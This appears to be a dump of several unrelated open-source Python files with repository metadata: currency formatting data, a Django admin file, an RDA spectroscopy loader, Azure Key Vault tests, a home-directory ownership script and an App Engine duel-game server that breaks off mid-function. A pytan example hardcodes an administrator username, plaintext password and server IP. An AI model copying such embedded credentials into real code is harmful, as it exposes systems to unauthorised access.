'countries': ['Suriname', 'SR']
},
'STD': {
# SYMBOL: u'$',
'name': u'São Tomé and Príncipe dobra',
'countries': ['São Tomé and Príncipe', 'ST']
},
'SYP': {
SYMBOL: u'ل.س.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Syrian pound',
'countries': ['SY']
},
'SZL': {
# SYMBOL: u'$',
'name': 'Lilangeni',
'countries': ['Swaziland', 'SZ']
},
'THB': {
SYMBOL: u'฿',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Thai baht',
'countries': ['TH']
},
'TJS': {
SYMBOL: u'т.р.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ';',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Tajikistani somoni',
'countries': ['TJ']
},
'TMT': {
SYMBOL: u'm.',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Turkmenistani manat',
'countries': ['TM']
},
'TND': {
SYMBOL: u'د.ت.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Tunisian dinar',
'countries': ['TN']
},
'TOP': {
# SYMBOL: u'$',
'name': u'Tongan paʻanga',
'countries': ['Tonga', 'TO']
},
'TRY': {
SYMBOL: u'TL',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Turkish lira',
'countries': ['TR']
},
'TTD': {
SYMBOL: u'TT$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Trinidad and Tobago dollar',
'countries': ['TT']
},
'TWD': {
SYMBOL: u'NT$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'New Taiwan dollar',
'countries': ['TW']
},
'TZS': {
# SYMBOL: u'$',
'name': 'Tanzanian shilling',
'countries': ['Tanzania', 'TZ']
},
'UAH': {
SYMBOL: u'грн.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Ukrainian hryvnia',
'countries': ['UA']
},
'UGX': {
# SYMBOL: u'$',
'name': 'Ugandan shilling',
'countries': ['Uganda', 'UG']
},
'USD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'United States dollar',
'countries': ['US', 'EC', 'PR', 'SV']
},
'UYU': {
SYMBOL: u'$U',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Uruguayan peso',
'countries': ['UY']
},
'UZS': {
SYMBOL: u'сўм',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Uzbekistan som',
'countries': ['Uzbekistan', 'UZ']
},
'VEF': {
SYMBOL: u'Bs',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Venezuelan bolívar fuerte',
'countries': ['VE']
},
'VND': {
SYMBOL: u'₫',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Vietnamese dong',
'countries': ['VN']
},
'VUV': {
# SYMBOL: u'$',
        'name': 'Vanuatu vatu',
        'countries': ['Vanuatu', 'VU']
},
'WST': {
# SYMBOL: u'$',
'name': 'Samoan tala',
'countries': ['Samoa', 'WS']
},
'XAF': {
SYMBOL: u'$',
'name': 'CFA franc BEAC',
'countries': ['Cameroon, Central African Republic, Republic of the Congo, Chad, Equatorial Guinea, Gabon', 'CM', 'CF', 'CG', 'TD', 'GQ', 'GA']
},
'XCD': {
SYMBOL: u'$',
'name': 'East Caribbean dollar',
'countries': ['Anguilla, Antigua and Barbuda, Dominica, Grenada, Montserrat, Saint Kitts and Nevis, Saint Lucia, Saint Vincent and the Grenadines', 'AI', 'AG', 'DM', 'GD', 'MS', 'KN', 'LC', 'VC']
},
'XOF': {
SYMBOL: u'XOF',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'CFA Franc BCEAO',
'countries': ["Benin, Burkina Faso, Côte d'Ivoire, Guinea-Bissau, Mali, Niger, Senegal, Togo", 'SN']
},
'XPF': {
# SYMBOL: u'$',
'name': 'CFP franc',
'countries': ['French Polynesia, New Caledonia, Wallis and Futuna', 'PF', 'NC', 'WF']
},
'YER': {
SYMBOL: u'ر.ي.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Yemeni rial',
'countries': ['Yemen', 'YE']
},
'ZAR': {
SYMBOL: u'R',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'South African rand',
'countries': ['ZA']
},
'ZMK': {
# SYMBOL: u'$',
'name': 'Zambian kwacha',
'countries': ['Zambia', 'ZM']
},
'ZWL': {
SYMBOL: u'Z$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Zimbabwe dollar',
'countries': ['ZW']
},
}
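
# Hedged sketch (not part of the original module): one way to render an amount
# using the metadata above. Two decimal places and simple three-digit grouping
# are assumptions; entries lacking format metadata (e.g. 'FJD') are not handled.
def format_currency(code, value):
    cur = CURRENCIES[code]
    fmt = cur[NEGATIVE_FORMAT] if value < 0 else cur[POSITIVE_FORMAT]
    whole, frac = '{0:.2f}'.format(abs(value)).split('.')
    if cur.get(GROUP_DIGITS):
        # group the integer part into blocks of three, right to left
        groups = []
        while whole:
            groups.append(whole[-3:])
            whole = whole[:-3]
        whole = cur[DIGIT_GROUP_SYMBOL].join(reversed(groups))
    return fmt.format(symbol=cur[SYMBOL], value=whole + cur[DECIMAL_SYMBOL] + frac)

# format_currency('USD', -1234.5) == u'($1,234.50)'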
|
allanlei/django-currency
|
currencies/__init__.py
|
Python
|
bsd-3-clause
| 35,230
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import TimeSession
# Register your models here.
admin.site.register(TimeSession)
|
mooja/eisenhower_dashboard
|
eisenhower_dashboard/matrix/admin.py
|
Python
|
mit
| 193
|
from suspect import MRSData, transformation_matrix
import numpy
import struct
import re
# The RDA format consists of a large number of key value pairs followed by raw
# data. The values need to be cast into different datatypes depending on the
# key, this dictionary stores a mapping of key to datatype.
rda_types = {
"floats": ["PatientWeight", "TR", "TE", "TM", "TI", "DwellTime", "NumberOfAverages",
"MRFrequency", "MagneticFieldStrength", "FlipAngle", "SliceThickness",
"FoVHeight", "FoVWidth", "PercentOfRectFoV", "PixelSpacingRow",
"PixelSpacingCol", "VOIPositionSag", "VOIPositionCor",
"VOIPositionTra", "VOIThickness", "VOIPhaseFOV", "VOIReadoutFOV",
"VOIReadoutVOV", "VOINormalSag", "VOINormalCor", "VOINormalTra",
"VOIRotationInPlane", "FoV3D", "PixelSpacing3D"],
"integers": ["SeriesNumber", "InstanceNumber", "AcquisitionNumber", "NumOfPhaseEncodingSteps",
"NumberOfRows", "NumberOfColumns", "VectorSize", "EchoNumber",
"NumberOf3DParts", "HammingFilterWidth", "NumberOfEchoes"],
"strings": ["PatientID", "PatientName", "StudyDescription", "PatientBirthDate",
"StudyDate", "StudyTime", "PatientAge", "SeriesDate", "SeriesTime",
"SeriesDescription", "ProtocolName", "PatientPosition", "ModelName",
"StationName", "InstitutionName", "DeviceSerialNumber", "InstanceDate",
"InstanceTime", "InstanceComments", "SequenceName", "SequenceDescription",
"Nucleus", "TransmitCoil", "PatientSex", "HammingFilter", "FrequenceCorrection"],
"float_arrays": ["PositionVector", "RowVector", "ColumnVector"],
"integer_arrays": ["CSIMatrixSize", "CSIMatrixSizeOfScan", "CSIGridShift"],
"string_arrays": ["SoftwareVersion"],
"dictionaries": ["TransmitRefAmplitude"]
}
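
# Hedged helper (illustrative only; load_rda() below does its casting inline):
# how a single header value would be cast according to rda_types,
# e.g. _cast_header_value("TE", "30") -> 30.0.
def _cast_header_value(key, value):
    if key in rda_types["integers"]:
        return int(value)
    if key in rda_types["floats"]:
        return float(value)
    # strings and anything unrecognised stay as text
    return value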
def load_rda(filename):
header_dict = {}
with open(filename, 'rb') as fin:
header_line = fin.readline().strip()
if header_line != b">>> Begin of header <<<":
raise Exception("Error reading file {} as a .rda".format(filename))
header_line = fin.readline().strip().decode('windows-1252')
while header_line != ">>> End of header <<<":
key, value = map(str.strip, header_line.split(":", 1))
if key in rda_types["strings"]:
header_dict[key] = value
elif key in rda_types["integers"]:
header_dict[key] = int(value)
elif key in rda_types["floats"]:
header_dict[key] = float(value)
elif "[" in key and "]" in key:
# could be a dict or a list
                key, index = re.split(r"\]|\[", key)[0:2]
if key in rda_types["dictionaries"]:
if key not in header_dict:
header_dict[key] = {}
header_dict[key][index] = value
else:
# not a dictionary, must be a list
if key in rda_types["float_arrays"]:
value = float(value)
elif key in rda_types["integer_arrays"]:
value = int(value)
index = int(index)
# make sure there is a list in the header_dict, with enough entries
                        if key not in header_dict:
header_dict[key] = []
while len(header_dict[key]) <= index:
header_dict[key].append(0)
header_dict[key][index] = value
header_line = fin.readline().strip().decode('windows-1252')
# now we can read the data
data = fin.read()
# the shape of the data in slice, column, row, time format
data_shape = header_dict["CSIMatrixSize"][::-1]
data_shape.append(header_dict["VectorSize"])
data_shape = numpy.array(data_shape)
data_size = numpy.prod(data_shape) * 16 # each data point is a complex double, 16 bytes
if data_size != len(data):
raise ValueError("Error reading file {}: expected {} bytes of data, got {}".format(filename, data_size, len(data)))
# unpack the data into complex numbers
data_as_floats = struct.unpack("<{}d".format(numpy.prod(data_shape) * 2), data)
float_iter = iter(data_as_floats)
complex_iter = (complex(r, i) for r, i in zip(float_iter, float_iter))
complex_data = numpy.fromiter(complex_iter, "complex64", int(numpy.prod(data_shape)))
complex_data = numpy.reshape(complex_data, data_shape).squeeze()
# some .rda files have a misnamed field, correct this here
if "VOIReadoutFOV" not in header_dict:
if "VOIReadoutVOV" in header_dict:
header_dict["VOIReadoutFOV"] = header_dict.pop("VOIReadoutVOV")
# combine positional elements in the header
voi_size = (header_dict["VOIReadoutFOV"],
header_dict["VOIPhaseFOV"],
header_dict["VOIThickness"])
voi_center = (header_dict["VOIPositionSag"],
header_dict["VOIPositionCor"],
header_dict["VOIPositionTra"])
voxel_size = (header_dict["PixelSpacingCol"],
header_dict["PixelSpacingRow"],
header_dict["PixelSpacing3D"])
x_vector = numpy.array(header_dict["RowVector"])
y_vector = numpy.array(header_dict["ColumnVector"])
to_scanner = transformation_matrix(x_vector, y_vector, numpy.array(voi_center), voxel_size)
# put useful components from the header in the metadata
metadata = {
"voi_size": voi_size,
"position": voi_center,
"voxel_size": voxel_size,
"protocol": header_dict["ProtocolName"],
"to_scanner": to_scanner,
"from_scanner": numpy.linalg.inv(to_scanner)
}
return MRSData(complex_data,
header_dict["DwellTime"] * 1e-6,
header_dict["MRFrequency"],
te=header_dict["TE"],
transform=to_scanner,
metadata=metadata)
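
# Hedged usage sketch: "example.rda" is a placeholder path, not a bundled file.
if __name__ == "__main__":
    mrs_data = load_rda("example.rda")
    print(mrs_data.metadata["protocol"])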
|
bennyrowland/suspect
|
suspect/io/rda.py
|
Python
|
mit
| 6,095
|
# import the basic python packages we need
import os
import sys
import tempfile
import pprint
import traceback
# disable python from generating a .pyc file
sys.dont_write_bytecode = True
# change me to the path of pytan if this script is not running from EXAMPLES/PYTAN_API
pytan_loc = "~/gh/pytan"
pytan_static_path = os.path.join(os.path.expanduser(pytan_loc), 'lib')
# Determine our script name, script dir
my_file = os.path.abspath(sys.argv[0])
my_dir = os.path.dirname(my_file)
# try to automatically determine the pytan lib directory by assuming it is in '../../lib/'
parent_dir = os.path.dirname(my_dir)
pytan_root_dir = os.path.dirname(parent_dir)
lib_dir = os.path.join(pytan_root_dir, 'lib')
# add pytan_loc and lib_dir to the PYTHONPATH variable
path_adds = [lib_dir, pytan_static_path]
for aa in path_adds:
    if aa not in sys.path:
        sys.path.append(aa)
# import pytan
import pytan
# create a dictionary of arguments for the pytan handler
handler_args = {}
# establish our connection info for the Tanium Server
handler_args['username'] = "Administrator"
handler_args['password'] = "Tanium2015!"
handler_args['host'] = "10.0.1.240"
handler_args['port'] = "443" # optional
# optional, level 0 is no output except warnings/errors
# level 1 through 12 are more and more verbose
handler_args['loglevel'] = 1
# optional, use a debug format for the logging output (uses two lines per log entry)
handler_args['debugformat'] = False
# optional, this saves all response objects to handler.session.ALL_REQUESTS_RESPONSES
# very useful for capturing the full exchange of XML requests and responses
handler_args['record_all_requests'] = True
# instantiate a handler using all of the arguments in the handler_args dictionary
print "...CALLING: pytan.handler() with args: {}".format(handler_args)
handler = pytan.Handler(**handler_args)
# print out the handler string
print "...OUTPUT: handler string: {}".format(handler)
# setup the arguments for the handler() class
kwargs = {}
kwargs["objtype"] = u'userrole'
kwargs["id"] = 1
print "...CALLING: handler.get with args: {}".format(kwargs)
response = handler.get(**kwargs)
print "...OUTPUT: Type of response: ", type(response)
print "...OUTPUT: print of response:"
print response
# call the export_obj() method to convert response to JSON and store it in out
export_kwargs = {}
export_kwargs['obj'] = response
export_kwargs['export_format'] = 'json'
print "...CALLING: handler.export_obj() with args {}".format(export_kwargs)
out = handler.export_obj(**export_kwargs)
# trim the output if it is more than 15 lines long
if len(out.splitlines()) > 15:
out = out.splitlines()[0:15]
out.append('..trimmed for brevity..')
out = '\n'.join(out)
print "...OUTPUT: print the objects returned in JSON format:"
print out
|
tanium/pytan
|
BUILD/doc/source/examples/get_userrole_by_id_code.py
|
Python
|
mit
| 2,787
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.keyvault.keys import KeyClient
from azure.keyvault.keys.crypto import CryptographyClient
from _shared.helpers import mock
def test_key_client_close():
transport = mock.MagicMock()
client = KeyClient(vault_url="https://localhost", credential=object(), transport=transport)
client.close()
assert transport.__enter__.call_count == 0
assert transport.__exit__.call_count == 1
def test_key_client_context_manager():
transport = mock.MagicMock()
client = KeyClient(vault_url="https://localhost", credential=object(), transport=transport)
with client:
assert transport.__enter__.call_count == 1
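    # leaving the context must call __exit__ once without re-entering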
assert transport.__enter__.call_count == 1
assert transport.__exit__.call_count == 1
def test_crypto_client_close():
transport = mock.MagicMock()
client = CryptographyClient(key="https://localhost/a/b/c", credential=object(), transport=transport)
client.close()
assert transport.__enter__.call_count == 0
assert transport.__exit__.call_count == 1
def test_crypto_client_context_manager():
transport = mock.MagicMock()
client = CryptographyClient(key="https://localhost/a/b/c", credential=object(), transport=transport)
with client:
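        # as above: exactly one __enter__ on entry, one __exit__ on exit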
assert transport.__enter__.call_count == 1
assert transport.__enter__.call_count == 1
assert transport.__exit__.call_count == 1
|
Azure/azure-sdk-for-python
|
sdk/keyvault/azure-keyvault-keys/tests/test_context_manager.py
|
Python
|
mit
| 1,517
|
# -*- coding: utf-8 -*-
import os, sys, shutil
if len(sys.argv) <= 2:
    print('the script must be called as:')
    print('python3 ' + sys.argv[0] + ' usuario dni')
exit(1)
usuario = sys.argv[1]
dni = sys.argv[2]
os.chdir('/home')
os.rename(usuario,dni)
os.chdir('/home/samba/profiles')
os.rename(usuario,dni)
"""
-- change the permissions on the directories --
/home/dni
/home/samba/profiles/dni
"""
for ruta, dirs, archivos in os.walk('/home/' + dni):
    shutil.chown(ruta, dni, 'root')
    for archivo in archivos:
        # join with the directory; the bare filename would resolve against the cwd
        shutil.chown(os.path.join(ruta, archivo), dni, 'root')
for ruta, dirs, archivos in os.walk('/home/samba/profiles/' + dni):
    shutil.chown(ruta, dni, 'root')
    for archivo in archivos:
        shutil.chown(os.path.join(ruta, archivo), dni, 'root')
|
pablodanielrey/python
|
gosa/changeOwnerDomain.py
|
Python
|
gpl-3.0
| 760
|
import urllib
import logging
import random
from datetime import datetime
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext import db
from google.appengine.ext.db import Key
class Move(db.Model):
move = db.StringProperty()
ctime = db.DateTimeProperty(auto_now_add=True)
para = db.StringProperty()
charm_hand = db.StringProperty()
charm_gesture = db.StringProperty()
has_para = db.IntegerProperty()
has_charm = db.IntegerProperty()
class Duel(db.Model):
chicken = db.IntegerProperty()
ctime = db.DateTimeProperty(auto_now_add=True)
now_turn = db.IntegerProperty()
received_count = db.IntegerProperty()
level = db.StringProperty()
class Account(db.Model):
ctime = db.DateTimeProperty(auto_now_add=True)
nonce = db.StringProperty()
level = db.IntegerProperty()
class User(db.Model):
ctime = db.DateTimeProperty(auto_now_add=True)
atime = db.DateTimeProperty(auto_now_add=True)
name = db.StringProperty()
level = db.IntegerProperty()
state = db.IntegerProperty()
"""
States:
0 I'm idle.
1 I propose a duel.
2 Somebody accepted my challenge.
3 I acknowledge someone's acceptance.
4 I accepted somebody's challenge.
9 I fled a duel.
"""
arg = db.StringProperty()
duel = db.StringProperty()
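
# Hedged walkthrough (toy trace, not code from the app) of the states above:
# challenger: 0 -> 1 (cmd "n", propose) -> 2 (opponent accepted) -> 3 (ack) -> 0 (cmd "f")
# acceptor:   0 -> 4 (cmd "N", accept) -> 0 (cmd "f"); state 9 marks a wizard who fled.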
class MainPage(webapp.RequestHandler):
def get(self):
if "" == self.request.query_string:
self.response.out.write("2")
return
cmd = self.request.get("c")
"""
if "deldeldel" == cmd:
logging.info("cleanup")
stuff = db.GqlQuery("SELECT * FROM Move")
for thing in stuff:
thing.delete()
return
"""
def logoff(userkey):
def del_user(userkey):
user = db.get(userkey)
if not user:
return None
user.delete()
return user
u = db.run_in_transaction(del_user, userkey)
if None == u:
logging.error("User already deleted.")
return
def del_acct():
acct = db.get(Key.from_path("Account", "n:" + u.name))
if not acct:
logging.error("Missing account for user.")
return
acct.delete()
db.run_in_transaction(del_acct)
if "l" == cmd: # Login.
name = urllib.unquote(self.request.get("a"))
b = self.request.get("b")
if "" == b:
logging.error("No level supplied.")
self.response.out.write("Error: No level supplied.")
return
level = int(b)
logging.info("login: " + name)
# TODO: Handle other bad names.
if "" == name:
logging.error("Empty name.")
self.response.out.write("Error: Empty name.")
return
def handle_login():
acct = db.get(Key.from_path("Account", "n:" + name))
if not acct:
acct = Account(key_name="n:" + name, level=level,
nonce="%X" % random.getrandbits(64))
acct.put()
return acct.nonce
else:
return ""
nonce = db.run_in_transaction(handle_login)
if "" == nonce:
self.response.out.write("Error: Name already in use.")
else:
user = User(key_name="n:" + nonce, name=name, state=0, arg="")
user.put()
self.response.out.write(nonce)
return
if "L" == cmd: # Logoff.
nonce = self.request.get("i")
logging.info("logout: " + nonce)
logoff(Key.from_path("User", "n:" + nonce))
return
if "r" == cmd: # Lobby refresh.
nonce = self.request.get("i")
def heartbeat():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user: return False, None
user.atime = datetime.now()
# Someone accepted the duel.
if 2 == user.state:
user.state = 3
user.put()
return True, user
user.put()
return False, user
flag, user = db.run_in_transaction(heartbeat)
if not user:
self.response.out.write("Error: No such user ID.")
return
if flag:
self.response.out.write("\n" + user.arg + "\n" + user.duel)
return
users = db.GqlQuery("SELECT * FROM User")
for u in users:
self.response.out.write(u.name + '\n')
self.response.out.write(unicode(u.state) + '\n')
self.response.out.write(u.arg + '\n')
if 0 == u.state or 1 == u.state:
if user.atime > u.atime and (user.atime - u.atime).seconds >= 12:
logging.info(u.name + " timeout: " + unicode((user.atime - u.atime).seconds))
logoff(u.key())
elif 9 == u.state:
# TODO: When net games become more robust, punish fleeing wizards
# with longer login bans.
if user.atime > u.atime and (user.atime - u.atime).seconds >= 4:
logging.info(u.name + " timeout: " + unicode((user.atime - u.atime).seconds))
logoff(u.key())
            # TODO: Update user.atime in SetMove and lower the timeout to a few minutes.
elif user.atime > u.atime and (user.atime - u.atime).seconds >= 2048:
logging.info(u.name + " timeout: " + unicode((user.atime - u.atime).seconds))
logoff(u.key())
return
if "n" == cmd: # New duel.
logging.info("New duel.")
a = self.request.get("a")
if "" == a:
logging.error("No level supplied.")
self.response.out.write("Error: No level supplied.")
return
level = int(a)
if level < 1 or level > 5:
logging.error("Bad level.")
self.response.out.write("Error: Bad level.")
return
nonce = self.request.get("i")
def new_duel():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user: return -2
user.atime = datetime.now()
if 0 == user.state:
user.state = 1
user.arg = a
user.put()
return 0
user.put()
return -1
status = db.run_in_transaction(new_duel)
if -2 == status:
logging.error("No such user.")
self.response.out.write("Error: No such user.")
elif -1 == status:
logging.error("User already started duel.")
self.response.out.write("Error: Already started duel.")
else:
self.response.out.write("OK")
return
if "N" == cmd: # Accept duel.
logging.info("Accept duel.")
a = urllib.unquote(self.request.get("a"))
if "" == a:
logging.error("Error: No opponent supplied.")
return
nonce = self.request.get("i")
duelid = "%X" % random.getrandbits(64)
def mark_user():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user:
return 0, "", None, -1
user.atime = datetime.now()
origstate = user.state
origarg = user.arg
# Can't accept a duel if you were advertising one and someone just
# accepted (but you don't know yet). Also can't accept a duel if
# already in one.
if 1 != user.state and 0 != user.state:
return 0, "", None, -2
user.state = 4
user.arg = a
user.duel = duelid
user.put()
return origstate, origarg, user, 0
origstate, origarg, user, status = db.run_in_transaction(mark_user)
if -1 == status:
self.response.out.write("Error: No such user ID.")
return
if -2 == status:
logging.warning("Already dueling. Ignoring.")
return
def restore():
def restore_state_arg(i, s):
user = db.get(Key.from_path("User", "n:" + nonce))
if user:
user.state = i
user.arg = s
user.put()
db.run_in_transaction(restore_state_arg, origstate, origarg)
return
acct = db.get(Key.from_path("Account", "n:" + a))
if not acct:
restore()
self.response.out.write("Error: Opponent unavailable.")
return
def accept_duel():
opp = db.get(Key.from_path("User", "n:" + acct.nonce))
if not opp: return ""
if 1 != opp.state: return ""
opp.state = 2
level = opp.arg
opp.arg = user.name
opp.duel = duelid
opp.put()
return level
level = db.run_in_transaction(accept_duel)
if "" == level:
self.response.out.write("Error: Opponent unavailable.")
restore()
logging.error("accept_duel failed.")
return
duel = Duel(key_name = "g:" + duelid,
level = level,
now_turn = 0,
received_count = 0)
duel.put()
self.response.out.write(duelid)
logging.info("Response: " + duelid)
return
gamename = self.request.get("g")
if "f" == cmd:
logging.info("Game " + gamename + " finished.")
nonce = self.request.get("i")
def restate_user():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user:
return None
user.atime = datetime.now()
user.state = 0
user.put()
return user
user = db.run_in_transaction(restate_user)
if not user:
self.response.out.write("Error: No such user ID.")
else:
self.response.out.write("OK")
def del_game():
game = Duel.get_by_key_name("g:" + gamename)
if game:
game.delete() # TODO: Also delete moves.
db.run_in_transaction(del_game)
return
game = Duel.get_by_key_name("g:" + gamename)
if not game:
logging.error("No such game: " + gamename)
self.response.out.write("Error: No such game.")
return
gamekey = game.key()
playerid = self.request.get("i")
if "D" == cmd:
def set_chicken():
game = db.get(gamekey)
if game:
game.chicken = 1
game.put()
db.run_in_transaction(set_chicken)
logging.info(gamename + ":" + playerid + " flees!")
def chicken_user():
user = db.get(Key.from_path("User", "n:" + playerid))
if not user:
return None
user.atime = datetime.now()
user.state = 9
user.put()
return user
db.run_in_transaction(chicken_user)
#logoff(Key.from_path("User", "n:" + playerid))
self.response.out.write("Chicken!")
return
if ('0' != playerid) and ('1' != playerid):
logging.error("Bad player ID.")
self.response.out.write("Error: Bad player ID.")
return
def CommandSetMove():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
a = self.request.get("a")
if "" == a:
logging.error("Error: Bad move.")
return
logging.info("SetMove " + gamename + ":" + turn_index +
":" + playerid + " " + a)
moveid = "m:" + gamename + turn_index + playerid
move = Move.get_by_key_name(moveid)
if move:
logging.warning("Move sent twice: ignored.")
self.response.out.write("OK")
return
else:
move = Move(key_name = moveid,
has_charm = 0,
has_para = 0)
move.move = a
move.put()
turn_int = int(turn_index)
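            # Turn bookkeeping, as implied by the branches below: each
            # Duel row tracks now_turn and received_count. A turn is
            # complete once both players' moves for now_turn have
            # arrived (received_count == 2); the first move for turn
            # now_turn + 1 then rolls now_turn forward and resets
            # received_count to 1. Anything else is logged as an error.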
def increment_received_count():
game = db.get(gamekey)
if game.now_turn == turn_int:
if 2 == game.received_count:
logging.error("received_count > 2!")
else:
game.received_count = game.received_count + 1
elif game.now_turn == turn_int - 1:
if 2 > game.received_count:
logging.error("incrementing turn though received_count < 2!")
game.now_turn = turn_int
game.received_count = 1
elif game.now_turn > turn_int:
logging.error("received ancient move!")
elif game.now_turn < turn_int - 1:
logging.error("received future move!")
game.put()
db.run_in_transaction(increment_received_count)
logging.info("rcount " + unicode(db.get(gamekey).received_count))
self.response.out.write("OK")
def CommandGetMove():
if game.chicken:
self.response.out.write('CHICKEN')
# TODO: Destroy this game.
return
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
turn_int = int(turn_index)
if game.now_turn > turn_int or (game.now_turn == turn_int and 2 == game.received_count):
logging.info("GetMove " + gamename + ":" + turn_index +
":" + playerid + " " + unicode(game.received_count))
moveid = "m:" + gamename + turn_index + unicode(1 - int(playerid))
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
else:
self.response.out.write(move.move)
else:
self.response.out.write('-')
return
def CommandSetPara():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
target = self.request.get("a")
if "" == target:
logging.error("Error: Bad paralysis target.")
return
if "0" == target:
targetid = playerid
else:
targetid = unicode(1 - int(playerid))
gesture = self.request.get("b")
if "" == gesture:
logging.error("Error: Bad paralysis gesture.")
return
moveid = "m:" + gamename + turn_index + targetid
logging.info("SetPara " + moveid)
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if (1 == move.has_para):
logging.error("Error: Already received paralysis.")
return
def put_para(key):
move = db.get(key)
move.para = gesture
move.has_para = 1
move.put()
db.run_in_transaction(put_para, move.key())
self.response.out.write("OK")
return
def CommandGetPara():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
target = self.request.get("a")
if "" == target:
logging.error("Error: Bad paralysis target.")
return
if "0" == target:
targetid = playerid
else:
targetid = unicode(1 - int(playerid))
moveid = "m:" + gamename + turn_index + targetid
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if 0 == move.has_para:
self.response.out.write("-")
else:
self.response.out.write(move.para)
return
def CommandSetCharm():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
# This is unnecessary as we always assume target is opponent.
target = self.request.get("a")
if "" == target:
self.response.out.write("Error: Bad charm target.")
return
s = self.request.get("b")
if "" == s:
self.response.out.write("Error: Bad charm choices.")
return
logging.info("SetCharm " + gamename + ":" + playerid + " " + target + " " + s)
moveid = "m:" + gamename + turn_index + unicode(1 - int(playerid))
logging.info("Charm " + moveid)
move = Move.get_by_key_name(moveid)
if not move:
self.response.out.write('Error: Cannot find move!')
return
if (1 == move.has_charm):
self.response.out.write("Error: Already received charm.")
return
def put_charm(key):
move = db.get(key)
move.charm_hand = s[0]
move.charm_gesture = s[1]
move.has_charm = 1
move.put()
db.run_in_transaction(put_charm, move.key())
self.response.out.write("OK")
return
def CommandGetCharmHand():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
moveid = "m:" + gamename + turn_index + playerid
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if 0 == move.has_charm:
self.response.out.write("-")
else:
